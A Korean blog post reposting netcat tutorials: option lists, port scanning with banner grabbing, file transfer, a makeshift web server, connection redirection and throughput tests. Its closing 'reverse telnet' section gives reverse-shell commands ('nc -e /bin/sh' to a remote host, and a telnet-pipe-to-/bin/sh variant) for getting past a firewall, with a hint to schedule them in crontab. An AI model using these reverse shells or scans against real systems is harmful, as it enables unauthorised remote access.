티스토리 뷰

개발 노트/Linux

tcp port open 확인

오리지날초이 2013. 11. 1. 11:03

원본 출처 : http://security.xmecca.com



[Mini how-to] Netcat for Windows NT  
Netcat의 소개

Netcat(이하 nc로 표기)은 Network connection 에서 raw-data read, write를 할수 있는 유틸리티 프로그램이다. 일반적으로는 UNIX의 cat과 비슷한 사용법을 가지고 있지만 cat이 파일에 쓰거나 읽듯이 nc는 network connection에 읽거나 쓴다. 이것은 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에도 이용범위가 매우 넓다.

Options
--------------------------------------------------------------------------

usage: nc [options] [target host] [ports]

-n : 호스트 네임과 포트를 숫자로만 입력받는다.

-v : verbosity 를 증가 시킨다. 더 많은 정보를 얻을수 있다.

-o [filename]: 보내거나 받은 데이터를 헥스덤프하여 파일에 저장한다.

-u : TCP connection 대신에 UDP connection 이 이루어 진다.

-p [port number or name]: local-port 를 지정한다. 주로 -l 과 같이 사용하게 된다.

-s [ip address or DNS]: local ip address 를 지정한다. 모든 플렛폼에서 지원되지는 않는다.

-l : listen 모드로 nc을 띠우게 된다. 당연히 target host는 입력하지 않는다. -p와 같이 사용하게 된다. nc를 server 로서 쓸때 사용.

-e [filename]: -DGAPING_SECURITY_HOLE 옵션으로 Make 되었을 때 사용가능하다. 
connection 이 이루어 졌을 때 file을 exec 시킨다. -l 과 같이 사용되면 한 instance만을 사용하는 inetd와 비슷하다.

-t : -DTELNET 옵션으로 컴파일 되었을 때 사용가능하다. telnetd에 접속이 가능하도록 
접속시 telnet과 같은 협상과정을 거친다.

-i [interval time]: nc는 일반적으로 8K 씩 데이터를 보내고 받는데 그렇게 Standard input의 한 라인씩 interval time마다 보내게 된다.

-z : connection을 이루기위한 최소한의 데이터 외에는 보내지 않도록 하는 옵션.

-r : port 지정이 여러개로 되어 있으면 이때 scanning 순서를 randomize하고 (일반적으로 범위로 지정하면 높은 번호의 포트부터 스캔한다) 또한 -p 옵션에서 지정가능한 local port도 randomize한다. 이때 주의 할 것은 -p가 -r을 override 한다는 것이다.

-g : ??

-G : ?? 

Using
--------------------------------------------------------------------------

multi-port connection

nc는 한 호스트에 한 번에 여러 connection 을 만들수 있다. 이 때 다음과 같이 여러개의 포트를 기술할 수 있다.
nc [target host] 20-30 

이때 std input으로 입력되는 데이터는 한꺼번에 보내지게 된다.

port scanning

target host 의 지정된 범위내에서의 어떤 포트가 어떻게 사용되고 있는 가를 검색할 수 있다.
nc -v -w 3 -z sparcs.kaist.ac.kr 20-30, 70-90

위의 명령은 다음 결과와 같이 20-30, 70-90 까지의 포트들에 대한 정보를 보여준다.

sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open

이것보다 더 자세한 정보를 얻고자 할때는

echo QUIT | nc -v -w 3 [target host] [ports]

라고 하면 응답이나 에러메세지로부터 버전정보등도 얻을 수 있다.

[songa@sparcs.kaist.ac.kr] ~ 13 echo QUIT | nc -v -w 3 sparcs 20-30, 70-90
sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
220 sparcs.kaist.ac.kr ESMTP Sendmail 8.8.7/8.8.7; Fri, 8 Jan 1999 15:21:36
+0900
221 sparcs.kaist.ac.kr closing connection
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
   sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
220 sparcs.kaist.ac.kr FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 
19:17:20 EDT 1998) ready.
221 Goodbye.
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
finger: QUIT: no such user.
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open


simple data transfer agent

nc를 이용해 간단한 data 전송을 할 ?있다.
receiver : nc -l -p 1234 | uncompress -c | tar xvfp -

sender : tar cfp - /some/dir | compress -c | nc -w 3 othermachine 1234


substitute of inetd

nc를 이용해 inetd에 등록하지 않고, 별다른 네트웍 설정 없이 프로그램을 테스트할 수 있다.
nc -l -p [port] -e [filename]


/*test.c*/ 
#include < stdio.h >
main(){
getchar();
printf("<html><head></head><body>햐하</body></html>\n");


nc -l -p 1234 -e test

이렇게 하면 간이 www server 도 된다. 

connection redirecting 
inetd.conf을 아래와 같은 형식으로 고쳐서 다른 서버로 redirecting을 할수 있다.

www stream tcp nowait /etc/tcpd /bin/nc -w 3 zero 80 

위의 것은 현재 서버에서 http서비스를 zero서버로 redirect시켰다. 

performance testing 

nc를 이용해서 큰 데이터를 서로 보내고 받음으로써 network의 performance를 테스트할수있다.
[songa@sparcs.kaist.ac.kr] /etc 31 > yes AAAA | nc -v -v -l -p 1234 > /dev/nul&
[1] 3258 3259
[songa@sparcs.kaist.ac.kr] /etc 32 > listening on [any] 1234 ...
[songa@sparcs.kaist.ac.kr] /etc 32 > 
[songa@sparcs.kaist.ac.kr] /etc 32 > 
[songa@sparcs.kaist.ac.kr] /etc 32 > yes BBBB | nc sparcs 1234 > /dev/null &
[2] 3475 3476
[songa@sparcs.kaist.ac.kr] /etc 33 > connect to [143.248.8.2] from sparcs.kaisac.kr 
[143.248.8.2] 31844
[songa@sparcs.kaist.ac.kr] /etc 33 > kill %
[songa@sparcs.kaist.ac.kr] /etc 34 > sent 23470080, rcvd 21675480





그리고

http://www.wowhacker.com/BoArD/view.php?id=abc_lecture&page=1&category=&sn=off&ss=on&sc=on&keyword=netcat&select_arrange=headnum&desc=asc&no=152

여기도 있구요..

지금부터 아래내용의 문서는

http://security.xmecca.com의 Oprix님이 쓰신 글입니다





Netcat == nc 

이 문서를 쓰실 때 출처(http://security.xmecca.com)를 꼭 적어 주시면 
어느 곳이나 쓰실 수 있습니다. 
BBS에 글까지 남겨주시면 더욱 고맙겠습니다. 

Netcat ReadMe를 부분부분 번역했습니다. 
=========================================================== 

Netcat(간단하게 nc라고도 함)은 http://www.l0pht.com/users/10pht/nc110.tgz 에서 구할 수 있습니다. 

Netcat은 TCP나 UDP 네트워크 연결을 통해서 데이터를 읽거나 쓸 수 있도록 만든 프로그램입니다. 
특별하게 쉘 스크립트나 다른 프로그램에서 사용하도록 만든 "Back-end" 툴입니다. 
그와 동시에 약간의 재미있는 여러가지 연결로 네트워크를 디버깅하고 조사할 수 있게 만든 툴입니다. 
Netcat은 실제로 nc라는 프로그램이름을 가지고 있습니다. 
예전부터 신비롭지만 표준적인 유닉스 툴로 제공되었습니다. ( 그런가 -_-;;) 

간단한 사용법으로 "nc host port" 하면 주어진 호스트의 특정 포트로 TCP 연결을 합니다. 그리고 
여러분의 표준 입력을 그 쪽으로 보냅니다. 그리고 표준 출력을 연결을 통해서 
이쪽에 보여줍니다. 이건 한쪽 네트워크가 다운 될때까지 계속할 수 있습니다. end-of-file을 
입력하면 종료되는 다른 프로그램과 다르게 계속 작동합니다. 

또한 NetCat은 서버로 사용할 수 있습니다. 지정한 포트로 들어오는 연결을 기다리도록 사용할 수 있습니다. 

그리고 UDP를 통해서도 이렇게 할 수 있습니다. TCP 보다 덜 신뢰되고 어떤 
시스템에서는 많은 데이터를 보낼 수 없지만 유용할 때가 있습니다. 

NetCat이 할 수 있는 대표적인 일로는 

Outbound or inbound connections, TCP or UDP, to or from any ports 
Full DNS forward/reverse checking, with appropriate warnings 
Ability to use any local source port 
Ability to use any locally-configured network source address 
Built-in port-scanning capabilities, with randomizer 
Built-in loose source-routing capability 
Can read command line arguments from standard input 
Slow-send mode, one line every N seconds 
Hex dump of transmitted and received data 
Optional ability to let another program service established connections 
Optional telnet-options responder 

이것이 있습니다. (이건 여러분 각자가 번역해 보세요.) 

만드는 법 

http://www.l0pht.com/users/10pht/nc110.tgz 에서 구할 수 있습니다. 

압축을 풀고 

특별하게 설정할 건 없고 

Makefile에서 -DGAPING_SECURITY_HOLE 이 부분을 추가 시켜주는게 중요합니다. 
이게 없으면 유용한 -e 옵션을 쓰지 못합니다. 

### HARD TARGETS 

nc: netcat.c 
    $(LD) $(DFLAGS) $(XFLAGS) $(STATIC) -DGAPING_SECURITY_HOLE -o nc netcat.c $(XLIBS) 

고친다음 make linux 하면 됩니다. 

자 사용해 보기 전에 도움말을 봅시다. 

$ ./nc -h 
[v1.10] 
어느 곳에 접속할때:   nc [-옵션] hostname port[s] [ports] ... 
접속을 기다릴때:     nc -l -p port [-options] [hostname] [port] 
options: 
        -e prog                 프로그램 접속후 프로그램을 실행한다. [ 위험 ] 
        -g gateway              source-routing hop point[s], up to 8 
        -G num                  source-routing pointer: 4, 8, 12, ... 
        -h                      도움말 
        -i secs                 라인을 보낼 때 마다 secs 만큼 쉰다. 스캔할때 사용 
        -l                      listen 모드 , 들어오는 패킷에 반응한다. 
        -n                      DNS를 이용하지 않고 IP 주소를 사용한다. 
        -o file                 내용을 file에 기록한다. 
        -p port                 로컬 포트 번호 
        -r                      컴퓨터가 마음대로 포트를 지정한다. 
        -s addr                 local source address 
        -u                      UDP 모드 
        -v                      출력을 자세하게 한다. 
        -w secs                 마지막으로 읽은 다음 secs 후에 종료한다. 
        -z                      아무 데이터도 안 보낸다. scan 때 사용 
포트는 하나하나 지정하거나 범위를 쓸 수 있습니다. 낮은 포트-높은 포트 




이 문서를 쓰실 때 출처(http://security.xmecca.com)를 꼭 적어 주시면 
어느 곳이나 쓰실 수 있습니다. 
BBS에 글까지 남겨주시면 더욱 고맙겠습니다. 

Netcat ReadMe를 부분부분 번역했습니다. 
=========================================================== 
간단한 스캐닝 툴로 사용할 수 있습니다. 

$ echo QUIT | nc -v -w 5 localhost 25-100   
localhost.localdomain [127.0.0.1] 25 (smtp) open 
220 s210-219-158-88.thrunet.ne.kr ESMTP Sendmail 8.9.3/8.9.3; Thu, 31 May 2001 00:30:34 +0900 
221 s210-219-158-88.thrunet.ne.kr closing connection 

$ nc -v -w 5 localhost 25-100 이렇게 하면 열린 포트만 볼 수 있습니다. 

파일 전송에도 사용됩니다. 

보내는 쪽 
$ cat html.tgz | nc -w 3 x.x.x.x 1234 

받는 쪽 
$ nc -l -p 1234 > html.tgz 

간단한 방화벽으로 사용됩니다. 

ined.conf에 

[realwww는 실제 웹서버 주소] 

www stream tcp nowait nobody /etc/tcpd /bin/nc -w 3 realwww 80 

네트워크 성능 평가 

서로 순서를 달리해서 해 보았습니다. 

A 서버 
$ yes BBBBBBBBBBBBBBBBBBBBBB | /tmp/nc x.x.x.x 2222 > /dev/null 
Broken pipe 
$ yes AAAAAAAAAAAAAAAAAAAAAA | /tmp/nc -v -v -l -p 2222 > /dev/null 
listening on [any] 2222 ... 
connect to [x.x.x.x] from x.x.x.x [x.x.x.x] 2790 
sent 6643712, rcvd 9542784 

A가 많이 받음 

B 서버 
$ yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null 
listening on [any] 2222 ... 
203.239.110.12: inverse host lookup failed: Unknown host 
connect to [x.x.x.x] from (UNKNOWN) [x.x.x.x] 1672 
sent 11145216, rcvd 8092008 
$ yes BBBBBBBBBBBBBBBBBBBBBB | nc x.x.x.x 2222 > /dev/null 
Broken pipe 

B가 많이 보냄 

로그 데이타 보내기 

쉘 스크립트에서 로그도 보낼 수 있습니다. 

echo '<38>message' | nc -w 1 -u loggerhost 514 

간이 웹 서버 
/* 간이 웹서버는 출처가 http://security.kaist.ac.kr/docs/netcat.html 입니다. */ 
nc를 이용해 간단한 웹서버로도 사용할 수 있습니다. 

nc -l -p [port] -e [filename] 

/*test.c*/ 
#include < stdio.h > 
main(){ 
getchar(); 
printf("햐하n"); 

nc -l -p 1234 -e test 

Reverse telnet 

먼저 이런 상황을 생각해 봅시다. A라는 서버에서는 어느 곳이나 접속할 
수 있습니다. B라는 서버에서는 방화벽 때문에 A라는 곳에 접속할 수 없 
습니다. 이럴 경우 사용하는게 Reverse telnet 이라는 기술입니다. 
즉 A라는 곳에서 B라는 곳으로 접속을 하지만 B에서 명령을 내릴 수 있다는 
겁니다. crontab에 저장해두면 쓸모 있겠지요. 

B 서버의 설정 

$ nc -l -p 1234 

A 서버의 설정 
$ nc -e /bin/sh B서버 주소 1234 

B에서 명령을 내릴 수 있습니다. 

$ nc -l -p 1234 
ls <-- 사용자가 친 명령 
Desktop 
Mail 
collect.data 
dead.letter 
epcs2.c 
face2.gif 
face_.gif 
html.tgz 

실력이 되시면 netcat Readme를 꼭 읽어보세요.


// 팁으로 사용하시라구 Reverse Telnet 부분도 넣었습니다

// 물론, 출처는 Oprix님입니다

아래에서 간단한 nc 기능 으로 Reverse telnet 을 구현해 보았습니다. 그런데 만약 상대편에 Netcat 이 없다면?? 

어떻게 할까요? 강좌만 읽는 분들 BBS에 글 남기세요. s[ㅡヘㅡ]z 

먼저 아래의 nc 에 대해서 잘 읽어 보시구요. 사용해 본다음 해보세요. 

A에서 B로 접속을 하는데 B에서 A로 명령을 내리는 겁니다. 

A(211.211.211.211) --------> B (211.211.211.212) 

B에서 창을 2개를 띄워서 nc를 2개를 띄워 놓습니다. 

첫번째 창 
$ nc -l -p 3456 

두번째 창 
$ nc -l -p 7890 

이렇게 해놓은 다음 

A에서 이렇게 명령을 내립니다. 

$ telnet 211.211.211.212 3456 | /bin/sh |telnet 211.211.211.212 7890 

이렇게 한다음 

B의 첫번째 창에서 ls 라고 한번 쳐보세요. 아무 반응이 없지요. ^^ 

이때 B의 두번째 창을 봐 보세요. 결과는 거기에 나타납니다. 

신기 하지요. ^^ 

왜 저렇게 하면 이런 현상이 나오는지 파이프에 대해서 곰곰히 생각해 보세요. 

이글은 출처(http://security.xmecca.com)를 알려주시면 어느 곳에나 쓸 수 있습니다. thanks truefinder

 


728x90
반응형

'개발 노트 > Linux' 카테고리의 다른 글

System monitoring tool in linux  (0) 2013.11.27
find 명령어 활용  (0) 2013.11.01
dos2unix  (0) 2013.10.31
리눅스에서 압축하기, 압축풀기  (1) 2013.10.02
리눅스 기본 데몬들  (0) 2013.09.16
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
글 보관함